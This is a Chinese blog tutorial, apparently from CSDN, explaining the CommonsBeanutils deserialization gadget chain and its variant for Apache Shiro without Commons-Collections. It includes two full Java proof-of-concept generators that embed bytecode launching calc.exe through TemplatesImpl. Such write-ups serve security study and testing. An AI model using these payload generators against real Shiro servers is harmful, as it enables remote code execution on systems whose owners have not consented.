• cbu和无cc的shiro反序列化

    前置知识

    学习CommonsBeanutils之前应该知道

    1. javaBean,可以看《Java简单特性》也可以看这里
    2. 有关BeanComparator的介绍
    3. TemplatesImpl gadget,前两个方法是public
    1. TemplatesImpl#getOutputProperties() -> TemplatesImpl#newTransformer() -> TemplatesImpl#getTransletInstance() -> TemplatesImpl#defineTransletClasses()
    2. -> TransletClassLoader#defineClass()

    cbu链原理

    BeanComparator()用于比较两个Java Bean,当property不存在的时候会调用PropertyUtils.getProperty去获取JavaBean的属性,也就是执行getter

    恰巧TemplatesImpl#getOutputProperties符合getter的命名规则

    Gadget

    1. Gadget chain:
    2.     ObjectInputStream.readObject()
    3.         PriorityQueue.readObject()
    4.             PriorityQueue.heapify()
    5.                 PriorityQueue.siftDown()
    6.                     siftDownUsingComparator()
    7.                         BeanComparator.compare()
    8.                             TemplatesImpl.getOutputProperties()
    9.                                 TemplatesImpl.newTransformer()
    10.                                     TemplatesImpl.getTransletInstance()
    11.                                         TemplatesImpl.defineTransletClasses()
    12.                                             TemplatesImpl.TransletClassLoader.defineClass()
    13.                                                  Runtime.exec()

    Poc

    1. import java.io.ByteArrayInputStream;
    2. import java.io.ByteArrayOutputStream;
    3. import java.io.ObjectInputStream;
    4. import java.io.ObjectOutputStream;
    5. import java.lang.reflect.Field;
    6. import java.util.Base64;
    7. import java.util.PriorityQueue;
    8.  
    9. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
    10. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
    11. import javassist.ClassPool;
    12. import org.apache.commons.beanutils.BeanComparator;
    13.  
    14. public class CommonsBeanutils1 {
    15.     public static void main(String[] args) throws Exception {
    16.         String base64encodedString = Base64.getEncoder().encodeToString(getpayload());
    17.         System.out.println(base64encodedString);
    18.     }
    19.  
    20.         public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
    21.         Field field = obj.getClass().getDeclaredField(fieldName);
    22.         field.setAccessible(true);
    23.         field.set(obj, value);
    24.     }
    25.  
    26.     public static byte[] getpayload() throws Exception {
    27.         byte[] code = Base64.getDecoder().decode("yv66vgAAADQANQoACwAaCQAbABwIAB0KAB4AHwoAIAAhCAAiCgAgACMHACQKAAgAJQcAJgcAJwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAoAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEADVN0YWNrTWFwVGFibGUHACYHACQBAApTb3VyY2VGaWxlAQAXSGVsbG9UZW1wbGF0ZXNJbXBsLmphdmEMABMAFAcAKQwAKgArAQATSGVsbG8gVGVtcGxhdGVzSW1wbAcALAwALQAuBwAvDAAwADEBAAhjYWxjLmV4ZQwAMgAzAQATamF2YS9pby9JT0V4Y2VwdGlvbgwANAAUAQASSGVsbG9UZW1wbGF0ZXNJbXBsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA9wcmludFN0YWNrVHJhY2UAIQAKAAsAAAAAAAMAAQAMAA0AAgAOAAAAGQAAAAMAAAABsQAAAAEADwAAAAYAAQAAAAsAEAAAAAQAAQARAAEADAASAAIADgAAABkAAAAEAAAAAbEAAAABAA8AAAAGAAEAAAAMABAAAAAEAAEAEQABABMAFAABAA4AAABsAAIAAgAAAB4qtwABsgACEgO2AAS4AAUSBrYAB1enAAhMK7YACbEAAQAMABUAGAAIAAIADwAAAB4ABwAAAA8ABAAQAAwAEgAVABUAGAATABkAFAAdABYAFQAAABAAAv8AGAABBwAWAAEHABcEAAEAGAAAAAIAGQ==");
    28.         TemplatesImpl obj = new TemplatesImpl();
    29.         setFieldValue(obj, "_bytecodes", new byte[][]{code});
    30.         setFieldValue(obj, "_name", "HelloTemplatesImpl");
    31.         setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
    32.  
    33.         final BeanComparator comparator = new BeanComparator();
    34.         final PriorityQueue queue = new PriorityQueue(2, comparator);
    35.         // stub data for replacement later
    36.         queue.add(1);
    37.         queue.add(1);
    38.  
    39.         setFieldValue(comparator, "property", "outputProperties");
    40.         setFieldValue(queue, "queue", new Object[]{obj, obj});
    41.  
    42.         ByteArrayOutputStream barr = new ByteArrayOutputStream();
    43.         ObjectOutputStream oos = new ObjectOutputStream(barr);
    44.         oos.writeObject(queue);
    45.         oos.close();
    46.  
    47.         //本地触发测试
    48.         System.out.println(barr);
    49.         ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
    50.         Object o = (Object)ois.readObject();
    51.  
    52.         return barr.toByteArray();
    53.     }
    54. }
      55.  

      Shiro反序列化遇到的困难
       

      • 本地生成payload的包和远程依赖的包版本不一导致serialVersionID不一致,反序列化失败
       

       

      • Shiro自带CommonsBeanutils,不依赖cc。但是Shiro反序列化需要cc
       

      虽然cbu本身依赖cc,但是Shiro中自带的cbu中的类不全,反序列化会失败
       

       

      no CC的Gadge
       

      org.apache.commons.collections.comparators.ComparableComparator在BeanComparator类的构造方法里面被用到,要解决没有cc的时候ClassNotFound的问题就需要替换这个ComparableComparator。
       

       

      因为ComparableComparator实现了Comparator接口,替换候选类需要满足:
       

      • 实现了java.util.Comparatorjava.io.Serializable接口
      • Java,shiro,cbu里面自带
       

      我们去看Comparator接口,看下哪些类实现了他:
       

       

      java.lang.String.CaseInsensitiveComparator:
       

       

      直接通过String.CASE_INSENSITIVE_ORDER就可以获得一个对象
       

      poc
       

      1. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
      2. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
      3. import org.apache.commons.beanutils.BeanComparator;
      4.  
      5. import java.io.ByteArrayInputStream;
      6. import java.io.ByteArrayOutputStream;
      7. import java.io.ObjectInputStream;
      8. import java.io.ObjectOutputStream;
      9. import java.lang.reflect.Field;
      10. import java.util.Base64;
      11. import java.util.PriorityQueue;
      12.  
      13. public class CommonsBeanutils1Shiro {
      14.     public static void main(String[] args) throws Exception {
      15.         String base64encodedString = Base64.getEncoder().encodeToString(getpayload());
      16.         System.out.println(base64encodedString);
      17.     }
      18.  
      19.     public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
      20.         Field field = obj.getClass().getDeclaredField(fieldName);
      21.         field.setAccessible(true);
      22.         field.set(obj, value);
      23.     }
      24.  
      25.     public static byte[] getpayload() throws Exception {
      26.         byte[] code = Base64.getDecoder().decode("yv66vgAAADQANQoACwAaCQAbABwIAB0KAB4AHwoAIAAhCAAiCgAgACMHACQKAAgAJQcAJgcAJwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAoAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEADVN0YWNrTWFwVGFibGUHACYHACQBAApTb3VyY2VGaWxlAQAXSGVsbG9UZW1wbGF0ZXNJbXBsLmphdmEMABMAFAcAKQwAKgArAQATSGVsbG8gVGVtcGxhdGVzSW1wbAcALAwALQAuBwAvDAAwADEBAAhjYWxjLmV4ZQwAMgAzAQATamF2YS9pby9JT0V4Y2VwdGlvbgwANAAUAQASSGVsbG9UZW1wbGF0ZXNJbXBsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA9wcmludFN0YWNrVHJhY2UAIQAKAAsAAAAAAAMAAQAMAA0AAgAOAAAAGQAAAAMAAAABsQAAAAEADwAAAAYAAQAAAAsAEAAAAAQAAQARAAEADAASAAIADgAAABkAAAAEAAAAAbEAAAABAA8AAAAGAAEAAAAMABAAAAAEAAEAEQABABMAFAABAA4AAABsAAIAAgAAAB4qtwABsgACEgO2AAS4AAUSBrYAB1enAAhMK7YACbEAAQAMABUAGAAIAAIADwAAAB4ABwAAAA8ABAAQAAwAEgAVABUAGAATABkAFAAdABYAFQAAABAAAv8AGAABBwAWAAEHABcEAAEAGAAAAAIAGQ==");
      27.         TemplatesImpl obj = new TemplatesImpl();
      28.         setFieldValue(obj, "_bytecodes", new byte[][]{code});
      29.         setFieldValue(obj, "_name", "HelloTemplatesImpl");
      30.         setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
      31.  
      32.         final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
      33.         final PriorityQueue queue = new PriorityQueue(2, comparator);
      34.         // stub data for replacement later
      35.         queue.add("1");
      36.         queue.add("1");
      37.  
      38.         setFieldValue(comparator, "property", "outputProperties");
      39.         setFieldValue(queue, "queue", new Object[]{obj, obj});
      40.  
      41.         // 生成序列化字符串
      42.         ByteArrayOutputStream barr = new ByteArrayOutputStream();
      43.         ObjectOutputStream oos = new ObjectOutputStream(barr);
      44.         oos.writeObject(queue);
      45.         oos.close();
      46.  
      47. //        //本地触发测试
      48. //        System.out.println(barr);
      49. //        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
      50. //        Object o = (Object)ois.readObject();
      51.  
      52.         return barr.toByteArray();
      53.     }
      54. }
        55. 
                
                    
                

                
      55. 

                    相关阅读:
        
                    
Hive sql 行列转换(行转列,列转行)                            
        
[SQL Server]数据库入门之多表查询                            
        
H3C IPSec IKE野蛮模式                            
        
zabbix监控部署keepalived高可用                            
        
docker学习笔记(3)- 镜像                            
        
【数据结构】二叉树相关OJ题                            
        
MySQL体系-日志与MVCC(源码层面)                            
        
登陆切换:将账号登陆切换为邮箱登录                            
        
宝宝照片保存大法!一键制作照片书                            
        
[附源码]SSM计算机毕业设计流浪动物救助网站JAVA                            
        
                            
                
        56. 
                
      56. 
                    原文地址:https://blog.csdn.net/why811/article/details/133904607
                
        57.